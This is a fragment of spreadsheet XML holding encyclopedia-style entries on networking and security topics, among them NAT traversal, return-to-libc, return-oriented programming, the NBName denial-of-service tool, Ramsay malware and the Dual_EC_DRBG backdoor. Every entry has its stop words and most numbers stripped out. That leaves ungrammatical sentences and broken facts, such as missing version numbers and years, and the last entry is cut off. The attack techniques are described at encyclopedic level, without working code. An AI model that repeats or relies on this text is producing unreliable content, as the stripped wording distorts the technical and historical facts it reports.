    <t>network address translation traversal computer networking technique establishing maintaining internet protocol connections across gateways implement network address translation (nat). traversal techniques required many network applications, peer-to-peer file sharing voice network address translation devices allow private addresses private networks behind routers single public address facing internet. internal network devices communicate hosts external network changing source address outgoing requests device relaying replies back originating device. this leaves internal network ill-suited hosting servers, device automatic method determining internal host incoming packets destined. this problem general access email. however, applications peer-to-peer file sharing, voip services, video game consoles require clients servers well. incoming requests cannot easily correlated proper internal host. furthermore, many types services carry address port number information application data, potentially requiring substitution deep packet inspection. network address translation technologies standardized. result, methods used traversal often proprietary poorly documented. many traversal techniques require assistance servers outside masqueraded network. some methods server establishing connection, others based relaying data increases bandwidth requirements latency, detrimental real-time voice video communications. traversal techniques usually bypass enterprise security policies. enterprise security experts prefer techniques explicitly cooperate firewalls, allowing traversal still enabling marshalling enforce enterprise security policies. ietf standards based security model realm-specific (rsip) middlebox communications (midcom). techniques following traversal techniques available: socket secure (socks) technology created early 1990s uses proxy servers relay traffic networks systems. traversal using relays around (turn) relay protocol designed specifically traversal. hole punching general technique exploits nats handle protocols (for example, udp, tcp, icmp) allow previously blocked packets nat. hole punching hole punching icmp hole punching session traversal utilities (stun) standardized methods network protocol hole punching. designed also extended tcp. interactive connectivity establishment (ice) complete protocol using stun and/or turn traversal picking best network route available. fills missing pieces deficiencies mentioned stun specification. upnp internet gateway device protocol (igdp) supported many small gateways home small office settings. allows device network router open port. nat-pmp protocol introduced apple alternative igdp. successor nat-pmp. application-level gateway (alg) component firewall allows configuring traversal filters. claimed numerous people technique creates problems solves. symmetric recent proliferation symmetric nats reduced traversal success rates many practical situations, mobile public wifi connections. hole punching techniques, stun ice, fail traversing symmetric nats without help relay server, practiced turn. techniques traverse symmetric nats attempting predict next port opened device discovered 2003 yutaka takeda panasonic communications research laboratory 2008 researchers waseda university. port prediction techniques effective devices known deterministic algorithms port selection. this predictable non-static port allocation scheme uncommon large scale nats used networks therefore port prediction largely ineffective mobile broadband networks. ipsec ipsec virtual private network clients traversal order encapsulating security payload packets traverse nat. ipsec uses several protocols operation must enabled traverse firewalls network address translators: internet exchange (ike) user datagram protocol (udp) port encapsulating security payload (esp) protocol number authentication header (ah) protocol number ipsec traversal port 4500, traversal usemany routers provide explicit features, often called ipsec passthrough.in windows traversal enabled default, windows service pack disabled default case server also behind device, rare controversial security issue. ipsec nat-t patches also available windows 2000, windows windows 98.nat traversal ipsec used enable opportunistic encryption traffic systems. traversal allows systems behind nats request establish secure connections demand. hosted traversal hosted traversal (hnt) mechanisms, including media relaying latching, widely used communications providers historical practical reasons. ietf advises using latching internet recommends security reasons. ietf standards documents 1579 firewall friendly 2663 network address translator (nat) terminology considerations 2709 security model tunnel-mode ipsec domains 2993 architectural implications 3022 traditional network address translator (traditional nat) 3027 protocol complications network address translator (nat) 3235 network address translator (nat)-friendly application design guidelines 3715 ipsec-network address translation (nat) compatibility 3947 negotiation nat-traversal 5128 state peer-to-peer (p2p) communication across network address translators (nats) 5245 interactive connectivity establishment (ice): protocol network address translator (nat) traversal offer/answer protocols also references external links problems fact modern traversal systems autonomous traversal communication without third party cornell university characterization measurement traversal nats firewalls columbia university analysis skype peer-to-peer internet telephony peer peer communication across network address translators (udp hole punching)</t>
  </si>
  <si>
    <t>Open Kernel Labs</t>
  </si>
  <si>
    <t>open kernel labs labs) privately owned company develops microkernel-based hypervisors operating systems embedded systems. company founded 2006 steve subar gernot heiser spinout nicta. headquartered chicago, research development located sydney, australia. company acquired general dynamics september 2012. products okl4 microvisor okl4 microvisor open-source software system software platform embedded systems used hypervisor, simple real-time operating system memory protection. variant microkernel. okl4 type hypervisor runs single- multi-core processors based arm, mips, processors.okl4 deployed billion mobile phones, baseband processor operating system hosting guest operating systems. most notable visible company's design motorola evoke messaging phone, first phone employs virtualization support concurrent operating systems (linux binary runtime environment wireless (brew)) processor core. paravirtualized guest oses labs also supplies ready-to-integrate paravirtualized guest application operating systems, including ok:symbian (symbianos), ok:linux (linux), ok:windows (windows) ok:android (android). hardware virtualization okl4 microvisor supports hardware virtualization extensions, introduced cortex-a15 processor. hardware virtualization greatly reduces changes required guest background labs okl4 result collaboration among academia, business, open-source development. labs technology derived microkernel originated early 1990s german research gmd, developed watson research center, university karlsruhe germany, university south wales nicta australia. commercial ventures, labs okl4 launched nicta 2006, investment citrix venture partners. labs technology continues benefit ties academia research projects, nicta, global open-source community. acquisition company acquired general dynamics september 2012 since closed sydney office. february 2014, systems founded former open kernel labs staff continued okl4 development sydney. april 2019, systems went liquidation closed. also wombat (operating system) references external links official website open kernel labs homepage open kernel labs community wiki nicta home page systems home page "hypervisor claimed 100% free". linuxfordevices. journaldev services private, ltd. archived original 2013-01-27.</t>
  </si>
  <si>
    <t>NBName</t>
  </si>
  <si>
    <t>nbname (note capitalization) computer program used carry denial-of-service attacks disable netbios services windows machines. written dystic cult dead (cdc) released july 2000 convention vegas.the program decodes provides user netbios name packets receives port 137. many command line options effectively disable netbios network prevent computers rejoining according dystic, "nbname disable entire lans prevent machines rejoining them...nodes netbios network infected tool think names already used machines. impossible everyone figure going on,' added." references external links nbname security focus microsoft security bulletin</t>
  </si>
  <si>
    <t>Open Computer Forensics Architecture</t>
  </si>
  <si>
    <t>open computer forensics architecture (ocfa) distributed open-source computer forensics framework used analyze digital media within digital forensics laboratory environment. framework built dutch national police. architecture ocfa consists back linux platform, uses postgresql database data storage, custom content-addressable storage carvfs based data repository lucene index. front ocfa made publicly available licensing issues. framework integrates open source forensic tools includes modules sleuth kit, scalpel, photorec, libmagic, privacy guard, objdump, exiftags, zip, 7-zip, tar, gzip, bzip2, rar, antiword, qemu-img, mbx2mbox. ocfa extensible java. also list digital forensics tools external links official website linux magazine article ocfa open source software digital forensics</t>
  </si>
  <si>
    <t>Open Cluster Framework</t>
  </si>
  <si>
    <t>open cluster framework (ocf) standards computer clustering. project started working group free standards group, part linux foundation. original supporters included several computing companies groups, including compaq, conectiva, ibm, linux-ha, software, open source development lab, oscar, hat, suse.ocf resource agents currently supported linux-ha heartbeat, high-availability cluster software. references external links website</t>
  </si>
  <si>
    <t>NDMP</t>
  </si>
  <si>
    <t>ndmp, network data management protocol, protocol meant transport data network attached storage (nas) devices backup devices. this removes need transporting data backup server itself, thus enhancing speed removing load backup server. originally invented netapp intelliguard, acquired legato corporation. currently, storage networking industry association (snia) oversees development protocol. most contemporary multi-platform backup software support protocol. external links ndmp snia site techtarget ndmp definition skardal, harald; bunnell, james; etc. (2003-04-02). "ndmp version protocol (draft spec)". ietf.</t>
  </si>
  <si>
    <t>NEC HYDRAstor</t>
  </si>
  <si>
    <t>hydrastor disk-based grid storage system data deduplication backups archiving, developed corporation. hydrastor storage system composed multiple nodes, starting 100+ nodes. each node contains standard hardware including disk drives, cpu, memory network interfaces integrated hydrastor software single storage pool. hydrastor software incorporates multiple features distributed storage systems: content-addressable storage, global data deduplication, variable block size, rabin fingerprinting, erasure codes, data encryption load balancing. history hydrastor project started 2002 cezary dubnicki cristian ungureanu research princeton, prototype version implemented evaluated 2004. after another years development, first version hydrastor brought market japan. subsequent version improved software hardware released following years, latest version, hs8-5000, providing 72tb storage node, 11.88pb capacity maximum configuration. main features hydrastor scaled single node nodes multi-rack grid appliance. capacity bandwidth scaled independently using different types nodes: storage nodes adding capacity hybrid nodes adding capacity performancehydrastor supports online expansion, automatic data migration downtime. standard configuration, hydrastor provides resiliency concurrent disk node failures. failures automatically detected data reconstruction automatically performed, means time failures enough reconstruct data, system withstand number them. references</t>
  </si>
  <si>
    <t>Return-to-libc attack</t>
  </si>
  <si>
    <t>"return-to-libc" attack computer security attack usually starting buffer overflow subroutine return address call stack replaced address subroutine already present process executable memory, bypassing no-execute feature present) ridding attacker need inject code. first example attack wild contributed alexander peslyak bugtraq mailing list 1997.on posix-compliant operating systems standard library ("libc") commonly used provide standard runtime environment programs written programming language. although attacker could make code return anywhere, libc likely target, almost always linked program, provides useful calls attacker (such system function used execute shell commands). protection return-to-libc attacks non-executable stack prevent buffer overflow exploitation, however cannot prevent return-to-libc attack return-to-libc attack existing executable code used. hand, attacks call preexisting functions. stack-smashing protection prevent obstruct exploitation detect corruption stack possibly flush compromised segment. "ascii armoring" technique used obstruct kind attack. with ascii armoring, system libraries (e.g., libc) addresses contain null byte (0x00). this commonly done placing first 0x01010101 bytes memory pages dubbed "ascii armor region"), every address (but including) value contains least null byte. this makes impossible emplace code containing addresses using string manipulation functions strcpy(). however, technique work attacker overflow null bytes stack. program large first protection incomplete. this technique similar another attack known return-to-plt where, instead returning libc, attacker uses procedure linkage table (plt) functions loaded position-independent code (e.g., system@plt, execve@plt, sprintf@plt, strcpy@plt).address space layout randomization (aslr) makes type attack extremely unlikely succeed 64-bit machines memory locations functions random. 32-bit systems, however, aslr provides little benefit since bits available randomization, defeated brute force matter minutes. also buffer overflow stack buffer overflow stack-smashing protection execute (nx) address space layout randomization return-oriented programming gadget (machine instruction sequence) unintended instructions references external links bypassing non-executable-stack exploitation using return-to-libc c0ntex css.csail.mit.edu</t>
  </si>
  <si>
    <t>Return-oriented programming</t>
  </si>
  <si>
    <t>return-oriented programming (rop) computer security exploit technique allows attacker execute code presence security defenses executable space protection code signing.in technique, attacker gains control call stack hijack program control flow executes carefully chosen machine instruction sequences already present machine's memory, called "gadgets". each gadget typically ends return instruction located subroutine within existing program and/or shared library code. chained together, gadgets allow attacker perform arbitrary operations machine employing defenses thwart simpler attacks. background return-oriented programming advanced version stack smashing attack. generally, types attacks arise adversary manipulates call stack taking advantage program, often buffer overrun. buffer overrun, function perform proper bounds checking storing user-provided data memory accept input data store properly. data written onto stack, excess data overflow space allocated function's variables (e.g., "locals" stack diagram right) overwrite return address. this address later used function redirect control flow back caller. overwritten, control flow diverted location specified return address. standard buffer overrun attack, attacker would simply write attack code (the "payload") onto stack overwrite return address location newly written instructions. until late 1990s, major operating systems offer protection attacks; microsoft windows provided buffer-overrun protections 2004. eventually, operating systems began combat exploitation buffer overflow bugs marking memory data written non-executable, technique known executable space protection. with enabled, machine would refuse execute code located user-writable areas memory, preventing attacker placing payload stack jumping return address overwrite. hardware support later became available strengthen protection. with data execution prevention, adversary cannot execute maliciously injected instructions typical buffer overflow overwrites contents data section memory, marked non-executable. defeat this, return-oriented programming attack inject malicious code, rather uses unintended instructions already present, called "gadgets", manipulating return addresses. typical data execution prevention cannot defend attack adversary malicious code rather combined "good" instructions changing return addresses; therefore code used would marked non-executable. return-into-library technique widespread implementation data execution prevention made traditional buffer overflow vulnerabilities difficult impossible exploit manner described above. instead, attacker restricted code already memory marked executable, program code linked shared libraries. since shared libraries, libc, often contain subroutines performing system calls functionality potentially useful attacker, likely candidates finding code assemble attack. return-into-library attack, attacker hijacks program control flow exploiting buffer overrun vulnerability, exactly discussed above. instead attempting write attack payload onto stack, attacker instead chooses available library function overwrites return address entry location. further stack locations overwritten, obeying applicable calling conventions, carefully pass proper parameters function performs functionality useful attacker. this technique first presented solar designer 1997, later extended unlimited chaining function calls. borrowed code chunks rise 64-bit processors brought change subroutine calling convention required first argument function passed register instead stack. this meant attacker could longer library function call desired arguments manipulating call stack buffer overrun exploit. shared library developers also began remove restrict library functions performed actions particularly useful attacker, system call wrappers. result, return-into-library attacks became much difficult mount successfully. next evolution came form attack used chunks library functions, instead entire functions themselves, exploit buffer overrun vulnerabilities machines defenses simpler attacks. this technique looks functions contain instruction sequences values stack registers. careful selection code sequences allows attacker suitable values proper registers perform function call calling convention. rest attack proceeds return-into-library attack. attacks return-oriented programming builds borrowed code chunks approach extends provide turing complete functionality attacker, including loops conditional branches. another way, return-oriented programming provides fully functional "language" attacker make compromised machine perform operation desired. hovav shacham published technique 2007 demonstrated important programming constructs simulated using return-oriented programming target application linked standard library containing exploitable buffer overrun vulnerability. return-oriented programming attack superior attack types discussed expressive power resistance defensive measures. none counter-exploitation techniques mentioned above, including removing potentially dangerous functions shared libraries altogether, effective return-oriented programming attack. x86-architecture although return-oriented programming attacks performed variety architectures, shacham's paper majority follow-up work focus intel architecture. architecture variable-length cisc instruction set. return-oriented programming takes advantage fact instruction "dense", random sequence bytes likely interpretable valid instructions. therefore possible search opcode alters control flow, notably return instruction (0xc3) look backwards binary preceding bytes form possibly useful instructions. these sets instruction "gadgets" chained overwriting return address, buffer overrun exploit, address first instruction first gadget. first address subsequent gadgets written successively onto stack. conclusion first gadget, return instruction executed, address next gadget stack jump conclusion gadget, chain continues third, chaining small instruction sequences, attacker able produce arbitrary program behavior pre-existing library code. shacham asserts given sufficiently large quantity code (including, limited standard library), sufficient gadgets exist turing-complete functionality.an automated tool developed help automate process locating gadgets constructing attack binary. this tool, known ropgadget, searches binary looking potentially useful gadgets, attempts assemble attack payload spawns shell accept arbitrary commands attacker. address space layout randomization address space layout randomization also vulnerabilities. according paper shacham al., aslr 32-bit architectures limited number bits available address randomization. only address bits available randomization, bits address randomization defeated brute force attack minutes. 64-bit architectures, bits available randomization. 2016, brute force attack 40-bit randomization possible, unlikely unnoticed. also, randomization defeated de-randomization techniques. even perfect randomization, information leakage memory contents would help calculate base address example shared library runtime. without return instruction according paper checkoway al., possible perform return-oriented-programming architectures without using return instruction (0xc3 x86). they instead used carefully crafted instruction sequences already exist machine's memory behave like return instruction. return instruction effects: firstly, searches four-byte value stack, sets instruction pointer value, secondly, increases stack pointer value four (equivalent operation). architecture, sequences instructions return instruction. arm, sequences load branch instructions return instruction. since approach return instruction, negative implications defense. when defense program checks several returns also several jump instructions, attack detected. defenses g-free g-free technique developed kaan onarlioglu, leyla bilge, andrea lanzi, davide balzarotti, engin kirda. practical solution possible form return-oriented programming. solution eliminates unaligned free-branch instructions (instructions like call attackers change control flow) inside binary executable, protects free-branch instructions used attacker. g-free protects return address similar canary implemented stackguard. further, checks authenticity function calls appending validation block. expected result found, g-free causes application crash. address space layout randomization number techniques proposed subvert attacks based return-oriented programming. most rely randomizing location program library code, attacker cannot accurately predict location instructions might useful gadgets therefore cannot mount successful return-oriented programming attack chain. fairly common implementation technique, address space layout randomization (aslr), loads shared libraries different memory location program load. although widely deployed modern operating systems, aslr vulnerable information leakage attacks approaches determine address known library function memory. attacker successfully determine location known instruction, position others inferred return-oriented programming attack constructed. this randomization approach taken relocating instructions and/or program state (registers stack objects) program separately, instead library locations. this requires extensive runtime support, software dynamic translator, piece randomized instructions back together runtime. this technique successful making gadgets difficult find utilize, comes significant overhead. another approach, taken kbouncer, modifies operating system verify return instructions actually divert control flow back location immediately following call instruction. this prevents gadget chaining, carries heavy performance penalty, effective jump-oriented programming attacks alter jumps control-flow-modifying instructions instead returns. binary code randomization some modern systems cloud lambda (faas) remote updates cloud infrastructure perform on-the-fly compilation software deployment. technique introduces variations instance executing software dramatically increase software's immunity attacks. brute forcing cloud lambda result attacking several instances randomized software reduces effectiveness attack. asaf shelly published technique 2017 demonstrated binary randomization software update system. every updated device, cloud-based service introduced variations code, performs online compilation, dispatched binary. this technique effective attacks rely knowledge internal structure software. drawback technique software never fully tested deployed feasible test variations randomized software. this means many binary randomization techniques applicable network interfaces system programming less recommended complex algorithms. sehop structured exception handler overwrite protection feature windows protects common stack overflow attacks, especially attacks structured exception handler. against control flow attacks small embedded systems proliferating expansion internet things, need protection embedded systems also increasing. using instruction based memory access control (ib-mac) implemented hardware, possible protect low-cost embedded systems malicious control flow stack overflow attacks. protection provided separating data stack return stack. however, lack memory management unit embedded systems, hardware solution cannot applied embedded systems. against return-oriented rootkits 2010, jinku proposed suitably modified compiler could completely eliminate return-oriented "gadgets" replacing call instruction sequence pushl $index; instruction sequence popl %reg; table(%reg), table represents immutable tabulation "legitimate" return addresses program index represents specific index table.: this prevents creation return-oriented gadget returns straight function arbitrary address middle another function; instead, gadgets return "legitimate" return addresses, drastically increases difficulty creating useful gadgets. claimed "our return indirection technique essentially de-generalizes return-oriented programming back style return-into-libc." their proof-of-concept compiler included peephole optimization phase deal "certain machine instructions happen contain return opcode opcodes immediate operands," movl $0xc3, %eax. pointer authentication codes (pac) armv8.3-a architecture introduces feature hardware level takes advantage unused bits pointer address space cryptographically sign pointer addresses using specially-designed tweakable block cipher signs desired value (typically, return address) combined "local context" value (e.g., stack pointer). before performing sensitive operation (i.e., returning saved pointer) signature checked detect tampering usage incorrect context (e.g., leveraging saved return address exploit trampoline context). notably apple chips used iphones upgraded armv8.3 pacs. linux gained support pointer authentication within kernel version released 2020; support userspace applications added 2018.in 2022, researchers published side-channel attack pacs dubbed pacman. also blind return oriented programming integer overflow spraying sigreturn-oriented programming (srop) threaded code return-oriented programming rediscovery threaded code notes references external links "computer scientists take over electronic voting machine with programming technique". science daily. 2009-08-11. "return-oriented programming attack demo video". youtube. antijop: program removes jop/rop vulnerabilities assembly language code</t>
  </si>
  <si>
    <t>NESSIE</t>
  </si>
  <si>
    <t>nessie (new european schemes signatures, integrity encryption) european research project funded 2000 2003 identify secure cryptographic primitives. project comparable nist process japanese government-sponsored cryptrec project, notable differences both. particular, overlap disagreement selections recommendations nessie cryptrec august 2003 draft report). nessie participants include foremost active cryptographers world, cryptrec project. nessie intended identify evaluate quality cryptographic designs several categories, issued public call submissions march 2000. forty-two received, february 2003 twelve submissions selected. addition, five algorithms already publicly known, explicitly submitted project, chosen "selectees". project publicly announced weaknesses found selected designs". selected algorithms selected algorithms submitters developers listed below. five already publicly known, formally submitted project, marked "*". most used anyone purpose without needing seek patent license anyone; license agreement needed marked "#", licensors committed "reasonable non-discriminatory license terms interested", according nessie project press release. none stream ciphers submitted nessie selected every fell cryptanalysis. this surprising result estream project. block ciphers misty1: mitsubishi electric camellia: nippon telegraph telephone mitsubishi electric shacal-2: gemplus aes*: (advanced encryption standard) (nist, fips 197) (aka rijndael) public-key encryption encrypt#: zurich research laboratory psec-kem: nippon telegraph telephone corp rsa-kem*: exchange mechanism (draft iso/iec 18033-2) algorithms cryptographic hash functions two-track-mac: katholieke universiteit leuven debis umac: intel corp, univ. nevada reno, research laboratory, technion institute, univ. california davis cbc-mac*: (iso/iec 9797-1); emac: berendschot hmac*: (iso/iec 9797-1); whirlpool: scopus tecnologia s.a. k.u.leuven sha-256*, sha-384* sha-512*: nsa, fips 180-2) digital signature algorithms ecdsa: certicom corp rsa-pss: laboratories sflash: schlumberger corp (sflash broken 2007 used anymore). identification schemes gps-auth: ecole normale supérieure, france télécom, poste other entrants entrants past first stage contest include noekeon, nimbus, nush, grand cru, anubis, hierocrypt, sc2000, lili-128. project contractors contractors representatives project were: katholieke universiteit leuven (prime contractor): bart preneel, alex biryukov, antoon bosselaers, christophe cannière, bart rompay école normale supérieure: jacques stern, louis granboulan, gwenaëlle martinet royal holloway, university london: sean murphy, alex dent, rachel shipsey, christine swart, juliette white siemens markus dichtl, marcus schafheutle technion institute technology: biham, dunkelman, vladimir furman université catholique louvain: jean-jacques quisquater, mathieu ciet, francesco sica universitetet bergen: lars knudsen, håvard raddum also ecrypt references external links homepage nessie project</t>
  </si>
  <si>
    <t>Opal Storage Specification</t>
  </si>
  <si>
    <t>opal storage specification specifications features data storage devices (such disk drives) enhance security. example, defines encrypting stored data unauthorized person gains possession device cannot data. that specification self-encrypting drives (sed). specification published trusted computing group storage workgroup. overview opal (security subsystem class) implementation profile storage devices built protect confidentiality stored user data unauthorized access leaves owner's control (involving power cycle subsequent deauthentication). enable interoperability multiple vendors. functions opal encompasses functions: security provider support interface communication protocol cryptographic features authentication table management access control personalization issuance discovery features security protocol support security protocol support communications protocol stack reset commands security radboud university researchers indicated november 2018 hardware encryption, including opal implementations, security vulnerabilities. implementers device companies hitachi intel corporation kingston technology lenovo micron technology samsung sandisk seagate technology toshiba storage controller companies marvell avago/lsi sandforce flash controllers software companies absolute software check point software technologies dell data protection cryptomill mcafee secude softex incorporated sophos symantec (symantec supports opal drives, support hardware-based encryption.) trend micro winmagic computer oems dell lenovo fujitsu panasonic getac references external links storage work group storage security subsystem class: opal</t>
  </si>
  <si>
    <t>NIS+</t>
  </si>
  <si>
    <t>nis+ directory service developed microsystems replace older 'nis' (network information service). designed eliminate need duplication across many computers configuration data user accounts, host names addresses, printer information disk mounts individual systems, instead using central repository master server, simplifying system administration. nis+ client software ported unix unix-like platforms. prior release solaris 2002, announced intent remove nis+ solaris future release recommends customers instead ldap-based lookup scheme. nis+ present solaris (although releases include tools migrate nis+ data ldap server) removed solaris nis+ nis+ similar purpose name, otherwise, completely different implementations. they differ following ways: nis+ hierarchical. nis+ based around secure (servers must authenticate clients vice versa). nis+ replicated (replicas read-only). nis+ implements permissions directories, tables, columns rows. nis+ also implements permissions operations, able nisping transfer changed data master replica. problem managing network information 1970s, computers expensive, networks consisted small number nodes, administering network information manageable, centralized system needed. computers became cheaper networks grew larger, became increasingly difficult maintain separate copies network configurations individual systems. example, user added network, following files would need updated every existing system: likewise, /etc/group would needed updating every time group added /etc/hosts would needed updating every time computer added network. user system added network existing systems, unix administrator would need modify files machines files all. with nis+, adding users machines network requires changes nis+ server's maps host's /etc/nsswitch.conf needs point nis+ server. when user logs machine, host (the nis+ client), knowing nis+ server queries username password identify authenticate user. nis+ also manages several types data: mounts (auto_master, auto_home), network booting parameters (bootparams, ethers, netmasks, netgroup, networks, protocols, rpc, services), security access (cred), aliases, time zone. installation nis+ comes table structures predefined. there facilities available create tables needed. alternatives other alternative schemes storing network information exist, ldap standard maintained ietf, including microsoft's ldap implementation, active directory. ldap configured handle general information, corporate employee structures, phone numbers, address, etc. requires thought planning. many organizations require features nis+, ldap, active directory simultaneously.another alternative popular certain environments hesiod name service, based protocols. nis+ client/server model unlike nis, nis+ uses hierarchical structure multiple domains. nis+ domain can, should, serviced multiple servers. primary server known master server, backup servers known replica servers. both types hold copies nis+ tables. changes first committed master server propagated replica servers increments. nis+ table permissions determine user's level access table's contents. also client–server model lightweight directory access protocol (ldap) network information service (nis) references external links hiltbrand (1999-07-30). "nis+ frequently asked questions". "nisplus installation administration". adminschoice.com. 2009-12-29. resources replace nis+ found migration resource site</t>
  </si>
  <si>
    <t>Ramsay Malware</t>
  </si>
  <si>
    <t>ramsay, also referred ramsay malware, cyber espionage framework toolkit discovered eset research 2020.ramsay specifically tailored windows systems networks connected internet also isolated intranets companies, called air-gapped networks, steals sensitive documents like word documents first collecting hidden storage folder.eset researchers found various versions malware, believe 2020 still development. they numbered versions ramsay version ramsay version ramsay version first encounter malware sample uploaded japan virustotal. first version compiled september 2019. last version found advanced.the discovery ramsay seen significant malware rarely able target physically isolated devices. authorship while authorship attributed, many common artefacts retro, backdoor hacking entity darkhotel believed operate interests south korea. workings malware three versions ramsay eset found different workings. ramsay version include rootkit, whilst later versions ramsay version exploit cve-2017-0199, "microsoft office/wordpad remote code execution vulnerability w/windows api."version also uses exploit cve-2017-11882 attack vector.the ramsay spread removable media like sticks network shares. way, malware jump gap. references external links welivesecurity article ramsay saved internet archive eset press release ramsay saved internet archive</t>
  </si>
  <si>
    <t>NIST SP 800-90A</t>
  </si>
  <si>
    <t>nist 800-90a ("sp" stands "special publication") publication national institute standards technology title recommendation random number generation using deterministic random generators. publication contains specification three allegedly cryptographically secure pseudorandom number generators cryptography: hash drbg (based hash functions), hmac drbg (based hmac), drbg (based block ciphers counter mode). since june 2015, current version publication revision earlier versions included fourth generator, dual_ec_drbg (based elliptic curve cryptography). dual_ec_drbg later reported probably contain kleptographic backdoor inserted united states national security agency (nsa), three random number generators accepted uncontroversial secure multiple cryptographers.as work federal government, nist 800-90a public domain freely available. backdoor dual_ec_drbg part bullrun program, inserting backdoors cryptography systems. target suggested 2013 dual_ec_drbg. accomplished working standardization process eventually become sole editor standard. getting dual_ec_drbg accepted nist 800-90a, cited prominent security firm security's usage dual_ec_drbg products. however, security paid million dual_ec_drbg default, deal reuters describes "handled business leaders rather pure technologists". million contract security dual_ec_drbg described reuters secret, people involved process accepting dual_ec_drbg nist 800-90a presumably made aware obvious conflict interest. this might help explain random number generator later shown inferior alternatives addition back door) made nist 800-90a standard. potential backdoor dual_ec_drbg already documented shumow niels ferguson 2007, continued used practice companies security 2013 revelation. given known flaws dual_ec_drbg, subsequently accusations security knowingly inserted backdoor products. denied knowingly inserting backdoor products.following backdoor revelation, nist reopened public vetting process nist 800-90a standard. revised version nist 800-90a removes dual_ec_drbg published june 2015. security analysis attempted security proof dual_ec_drbg states requires three problems mathematically hard order dual_ec_drbg secure: decisional diffie-hellman problem, x-logarithm problem, truncated point problem. decisional diffie-hellman problem widely accepted hard. x-logarithm problem widely accepted hard. some evidence shown problem hard evidence conclusive. security proof therefore questionable would proven invalid x-logarithm problem shown efficiently solvable. truncated point problem requires enough bits truncated point selected dual_ec_drbg make indistinguishable truly random number. however, truncation bits, default specified dual_ec_drbg standard, shown insufficient make output indistinguishable true random number generator therefore invalidates dual_ec_drbg's security proof default truncation value used. hash_drbg hmac_drbg security proofs single call generate pseudorandom numbers. paper proving security hash_drbg hmac_drbg cite attempted security proof dual_ec_drbg used previous paragraph security proof ctr_drbg drbg nist 800-90a lacks security proof.hmac_drbg also machine-verified security proof. thesis containing machine-verified security proof also proves compromise properly-implemented instance hmac_drbg compromise security numbers generated compromise. ctr_drbg ctr_drbg shown security problems used certain parameters cryptographers failed consider block size cipher designing pseudorandom number generator. ctr_drbg appears secure indistinguishable true random source used underlying block cipher bits taken pseudorandom number generator. when used underlying block cipher bits taken instantiation, required security level delivered caveat 128-bit cipher's output counter mode distinguished true random number generator. when used underlying block cipher bits taken pseudorandom number generator, resulting security level limited block size instead size therefore actual security level much less security level implied size. ctr_drbg also shown fail deliver expected security level whenever triple used 64-bit block size much less 112-bit size used triple des. nist 800-90a version history barker, elaine; kelsey, john (june 2006). "nist special publication 800-90: recommendation random number generation using deterministic random generators" (pdf). national institute standards technology. retrieved november 2016. withdrawn march 2007. barker, elaine; kelsey, john (march 2007). "nist special publication 800-90: recommendation random number generation using deterministic random generators (revised)" (pdf). national institute standards technology. retrieved november 2016. withdrawn january 2012. barker, elaine; kelsey, john (january 2012). "nist special publication 800-90a: recommendation random number generation using deterministic random generators" (pdf). national institute standards technology. doi:10.6028/nist.sp.800-90a. retrieved november 2016. {{cite journal}}: cite journal requires |journal= (help) withdrawn june 2015. barker, elaine; kelsey, john (june 2015). "nist released special publication (sp) 800-90a revision recommendation random number generation using deterministic random generators" (pdf). national institute standards technology. doi:10.6028/nist.sp.800-90ar1. retrieved november 2016. {{cite journal}}: cite journal requires |journal= (help) also nist 800-90b references external links elaine barker; john kelsey (2015). 800-90a rev. recommendation random number generation using deterministic random generators". nist. doi:10.6028/nist.sp.800-90ar1. {{cite journal}}: cite journal requires |journal= (help)</t>
  </si>
  <si>
    <t>Open Mobile Terminal Platform</t>
  </si>
  <si>
    <t>open mobile terminal platform (omtp) forum created mobile network operators discuss standards manufacturers mobile phones mobile devices. during lifetime, omtp included manufacturers huawei, electronics, motorola, nokia, samsung sony ericsson. membership omtp originally leading mobile operators. time transitioned wholesale applications community june 2010, nine full members: at&amp;t, deutsche telekom orange, smart communications, telecom italia, telefónica, telenor vodafone. omtp also support sponsors, ericsson nokia. activities omtp recommendations hugely helped standardise mobile operator terminal requirements, work gone towards helping defragment deoptionalise operators' recommendations. omtp's focus gathering driving mobile terminal requirements, publishing findings recommendations. omtp technology neutral, recommendations intended deployment across range technology platforms, operating systems (os) middleware layers. omtp perhaps best known work field mobile security, work encompassed full range mobile device capabilities. omtp published recommendations 2007 early 2008 areas positioning enablers, advanced device management, mobile voip. later, advanced trusted environment: omtp supporting document, 'security threats embedded consumer devices' released, endorsement home secretary, jacqui smith.omtp also published requirements document addressing support advanced cards. this document defines also advanced profiles smart card server, high speed protocol, mobile contactless.omtp also made significant progress getting support micro-usb standard connector data power. full list recommendations found gsma.com. bondi 2008, omtp launched initiative called bondi (named australian beach); initiative defined interfaces (javascript apis) security framework (based xacml policy description) enable access mobile phone functionalities (application invocation, application settings, camera, communications log, gallery, location, messaging, persistent data, personal information, phone status, user interaction) browser widget engine secure way. bondi initiative also open source reference implementation https://web.archive.org/web/20130509121758/https://web.archive.org/web/20130509121758/http://bondi.omtp.org//. approved release bondi issued june 2009. open source project comprehensive bondi started https://web.archive.org/web/20130528132818/http://bondisdk.org/. universal charging system february 2009, omtp expanded local connectivity specification (based micro-usb) describe requirements common charger common connector enable sharing battery charger different phones. omtp common charging local data connectivity adopted association universal charging system (ucs) initiative. this endorsed ctia itu. june, 2009 european commission reached agreement several major mobile phone providers requirements common external power supply (eps) compatible data-enabled phones sold european union. shares attributes charger. wholesale applications community june 2010, omtp transitioned wholesale applications community. omtp activities ceased time either taken within organisation standards industry associations. turn, july 2012 closed, omtp standards transferred gsma, assets personnel transferring apigee. also mobile security trrs standards references external links omtp documents gsma</t>
  </si>
  <si>
    <t>N2n</t>
  </si>
  <si>
    <t>open source layer layer utilising peer-to-peer architecture network membership routing. unlike many programs, also connect computers reside behind routers. these connections help third computer computers reach. this computer, called supernode, route information nated nodes.it free software licensed terms general public license v3.turbo custom windows server/client implementation n2n. references external links google play</t>
  </si>
  <si>
    <t>N-version programming</t>
  </si>
  <si>
